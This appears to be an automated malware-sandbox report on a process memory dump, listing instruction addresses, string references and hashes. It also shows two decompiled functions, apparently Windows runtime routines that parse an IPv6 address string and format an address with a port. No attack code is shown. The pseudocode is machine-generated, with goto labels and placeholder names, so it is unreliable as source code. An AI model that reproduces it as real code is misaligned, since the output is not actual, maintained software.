                                                                                                                                                              0x009124ba
                                                                                                                                                              0x009124bb
                                                                                                                                                              0x009124c6
                                                                                                                                                              0x009124cb
                                                                                                                                                              0x009124cd
                                                                                                                                                              0x009124d0
                                                                                                                                                              0x009124d1
                                                                                                                                                              0x009124d4
                                                                                                                                                              0x009124d6
                                                                                                                                                              0x009124d9
                                                                                                                                                              0x009124d9
                                                                                                                                                              0x009124dc
                                                                                                                                                              0x009124df
                                                                                                                                                              0x009124e1
                                                                                                                                                              0x009124e7
                                                                                                                                                              0x009124e9
                                                                                                                                                              0x009124ec
                                                                                                                                                              0x009124ef
                                                                                                                                                              0x009124f2
                                                                                                                                                              0x009124f2
                                                                                                                                                              0x009124ef
                                                                                                                                                              0x009124e7
                                                                                                                                                              0x009124fa
                                                                                                                                                              0x009124ff
                                                                                                                                                              0x00912501
                                                                                                                                                              0x00912503
                                                                                                                                                              0x00912506
                                                                                                                                                              0x0091250b
                                                                                                                                                              0x008deb8c
                                                                                                                                                              0x008deb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008deb93
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008deb99
                                                                                                                                                              0x008dec85
                                                                                                                                                              0x008dec85
                                                                                                                                                              0x008dec85
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0091248D
                                                                                                                                                              • RTL: Re-Waiting, xrefs: 009124FA
                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009124BD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                              • Opcode ID: 68981a5018f5c6bce14ca97f8fb8bf72b3b58b29a6591eff18fef030fd48ab0c
                                                                                                                                                              • Instruction ID: d3c2a45cd2f79f37941ff02d1c2de7e3711a30c91e3f64c76f7302d52e88f73a
                                                                                                                                                              • Opcode Fuzzy Hash: 68981a5018f5c6bce14ca97f8fb8bf72b3b58b29a6591eff18fef030fd48ab0c
                                                                                                                                                              • Instruction Fuzzy Hash: 4441E670600208ABDB24FBA8CC85FAA77A8FF84720F208616F665DB3D1D674E9518761
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008EFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E008EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E008EEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E008EEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E008E685D(_t167, 4) == 0) {
								if(E008E685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E008E685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E008E685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E008C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E008BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E008EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E008EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                              0x008efcd1
                                                                                                                                                              0x008efcd6
                                                                                                                                                              0x008efcd9
                                                                                                                                                              0x008efcdc
                                                                                                                                                              0x008efcdf
                                                                                                                                                              0x008efce2
                                                                                                                                                              0x008efce5
                                                                                                                                                              0x008efce8
                                                                                                                                                              0x008efceb
                                                                                                                                                              0x008efced
                                                                                                                                                              0x008efced
                                                                                                                                                              0x008efcf3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efcfc
                                                                                                                                                              0x008efcfe
                                                                                                                                                              0x008efdc1
                                                                                                                                                              0x0091ecbd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eccc
                                                                                                                                                              0x0091eccc
                                                                                                                                                              0x0091ecd2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ecdf
                                                                                                                                                              0x0091ece0
                                                                                                                                                              0x0091ece4
                                                                                                                                                              0x0091eceb
                                                                                                                                                              0x0091ecee
                                                                                                                                                              0x0091eca8
                                                                                                                                                              0x0091eca8
                                                                                                                                                              0x0091ecaa
                                                                                                                                                              0x008efd76
                                                                                                                                                              0x008efd79
                                                                                                                                                              0x008efdb4
                                                                                                                                                              0x008efdb5
                                                                                                                                                              0x008efdb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efdb6
                                                                                                                                                              0x008efd7e
                                                                                                                                                              0x0091ecfc
                                                                                                                                                              0x008efe2f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efe2f
                                                                                                                                                              0x0091ed08
                                                                                                                                                              0x0091ed0f
                                                                                                                                                              0x0091ed17
                                                                                                                                                              0x0091ed1b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed1b
                                                                                                                                                              0x008efd88
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efd94
                                                                                                                                                              0x008efd99
                                                                                                                                                              0x008efda1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efdb0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efdb0
                                                                                                                                                              0x0091ecbd
                                                                                                                                                              0x008efdc7
                                                                                                                                                              0x008efdcb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efdd7
                                                                                                                                                              0x008efde3
                                                                                                                                                              0x008efe06
                                                                                                                                                              0x00901fe7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00901fef
                                                                                                                                                              0x00901ff0
                                                                                                                                                              0x00901ff4
                                                                                                                                                              0x00901ff7
                                                                                                                                                              0x00901ffa
                                                                                                                                                              0x00901ffd
                                                                                                                                                              0x00902000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ecf1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efe06
                                                                                                                                                              0x008efde8
                                                                                                                                                              0x008efdec
                                                                                                                                                              0x008efdef
                                                                                                                                                              0x008efdf2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efdf2
                                                                                                                                                              0x008efdcb
                                                                                                                                                              0x008efd04
                                                                                                                                                              0x008efd05
                                                                                                                                                              0x0091ec67
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ec6f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ec6f
                                                                                                                                                              0x008efd13
                                                                                                                                                              0x008efd3c
                                                                                                                                                              0x008efd40
                                                                                                                                                              0x0091ec75
                                                                                                                                                              0x0091ec7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ec8a
                                                                                                                                                              0x0091ec8a
                                                                                                                                                              0x0091ec90
                                                                                                                                                              0x0091ecb2
                                                                                                                                                              0x008efd73
                                                                                                                                                              0x008efd73
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efd73
                                                                                                                                                              0x0091ec95
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eca1
                                                                                                                                                              0x0091eca4
                                                                                                                                                              0x0091eca5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091eca5
                                                                                                                                                              0x0091ec7a
                                                                                                                                                              0x008efd4a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efd6e
                                                                                                                                                              0x008efd6e
                                                                                                                                                              0x008efd71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efd71
                                                                                                                                                              0x008efd4a
                                                                                                                                                              0x008efd21
                                                                                                                                                              0x008fa3a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008fa3a1
                                                                                                                                                              0x008efd36
                                                                                                                                                              0x0090200b
                                                                                                                                                              0x00902012
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00902018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00902018
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efd36
                                                                                                                                                              0x008efe0f
                                                                                                                                                              0x008efe16
                                                                                                                                                              0x008fa3ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008fa3b3
                                                                                                                                                              0x008fa3b3
                                                                                                                                                              0x008efe1f
                                                                                                                                                              0x0091ed25
                                                                                                                                                              0x0091ed86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed91
                                                                                                                                                              0x0091ed95
                                                                                                                                                              0x0091ed95
                                                                                                                                                              0x0091ed9a
                                                                                                                                                              0x0091edad
                                                                                                                                                              0x0091edb3
                                                                                                                                                              0x0091edba
                                                                                                                                                              0x0091edc4
                                                                                                                                                              0x0091edc9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091edcc
                                                                                                                                                              0x0091ed2a
                                                                                                                                                              0x0091ed55
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed61
                                                                                                                                                              0x0091ed66
                                                                                                                                                              0x0091ed6e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed7d
                                                                                                                                                              0x0091ed30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ed3c
                                                                                                                                                              0x0091ed43
                                                                                                                                                              0x0091ed4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction ID: 2f4d1f2c4414e62e71ee08253f03116e08aa84c49ae297a0cb30e5a6fe029e85
                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                              • Instruction Fuzzy Hash: 05918035E0028AEBDF24CF59C8456EEB7B4FF56314F20807AD941EA292E7305A81CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 008EFE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E008EFE4F(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t18;
				signed int _t26;
				intOrPtr _t31;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr _t39;
				void* _t40;
				signed int _t43;
				void* _t44;

				_t37 = __edx;
				_t15 =  *0x992088; // 0x77473921
				_v8 = _t15 ^ _t43;
				_t17 = _a4;
				_t31 = _a12;
				_t38 = _a16;
				if(_a4 == 0 || _t38 == 0) {
					L7:
					_t18 = 0xc000000d;
				} else {
					if(_t31 == 0) {
						if( *_t38 == _t31) {
							goto L3;
						} else {
							goto L7;
						}
					} else {
						L3:
						_t40 = E008EFED6(_t17,  &_v52);
						if(_a8 != 0) {
							_t26 = E008E7707(_t40,  &_v8 - _t40 >> 1, L":%u", _a8 & 0x0000ffff);
							_t44 = _t44 + 0x10;
							_t40 = _t40 + _t26 * 2;
						}
						_t39 = (_t40 -  &_v52 >> 1) + 1;
						if( *_t38 < _t39) {
							 *_t38 = _t39;
							goto L7;
						} else {
							E008B2340(_t31,  &_v52, _t39 + _t39);
							 *_t38 = _t39;
							_t18 = 0;
						}
					}
				}
				return E008BE1B4(_t18, _t31, _v8 ^ _t43, _t37, _t38, _t39);
			}


















                                                                                                                                                              0x008efe4f
                                                                                                                                                              0x008efe57
                                                                                                                                                              0x008efe5e
                                                                                                                                                              0x008efe61
                                                                                                                                                              0x008efe65
                                                                                                                                                              0x008efe6a
                                                                                                                                                              0x008efe6f
                                                                                                                                                              0x008efeca
                                                                                                                                                              0x008efeca
                                                                                                                                                              0x008efe75
                                                                                                                                                              0x008efe77
                                                                                                                                                              0x0091ea62
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ea68
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0091ea68
                                                                                                                                                              0x008efe7d
                                                                                                                                                              0x008efe7d
                                                                                                                                                              0x008efe8c
                                                                                                                                                              0x008efe8e
                                                                                                                                                              0x0091ea87
                                                                                                                                                              0x0091ea8c
                                                                                                                                                              0x0091ea8f
                                                                                                                                                              0x0091ea8f
                                                                                                                                                              0x008efe9b
                                                                                                                                                              0x008efe9e
                                                                                                                                                              0x0091ea97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x008efea4
                                                                                                                                                              0x008efead
                                                                                                                                                              0x008efeb5
                                                                                                                                                              0x008efeb7
                                                                                                                                                              0x008efeb7
                                                                                                                                                              0x008efe9e
                                                                                                                                                              0x008efe77
                                                                                                                                                              0x008efec7

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 008EFED6: ___swprintf_l.LIBCMT ref: 008EFEFD
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0091EA87
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.2299696361.00000000008A0000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.2299683867.0000000000890000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299804221.0000000000980000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299812761.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299833424.0000000000994000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299855126.0000000000997000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299872905.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000010.00000002.2299932807.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: !9Gw$:%u
                                                                                                                                                              • API String ID: 48624451-4204418640
                                                                                                                                                              • Opcode ID: 4ca6a66e5c69e20bf6f42f96a0b0ff3bbe86980d8fec0c14f894dda6603eb07b
                                                                                                                                                              • Instruction ID: 4e0aabb0f45645646089c1d6bea47824dfc7401ed5f5ba66b3dfb3f2a29b7c57
                                                                                                                                                              • Opcode Fuzzy Hash: 4ca6a66e5c69e20bf6f42f96a0b0ff3bbe86980d8fec0c14f894dda6603eb07b
                                                                                                                                                              • Instruction Fuzzy Hash: 0111847250025AABCB10DEA9CC409EBB7ACFF55700B54452AF945D7252E730E9448BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%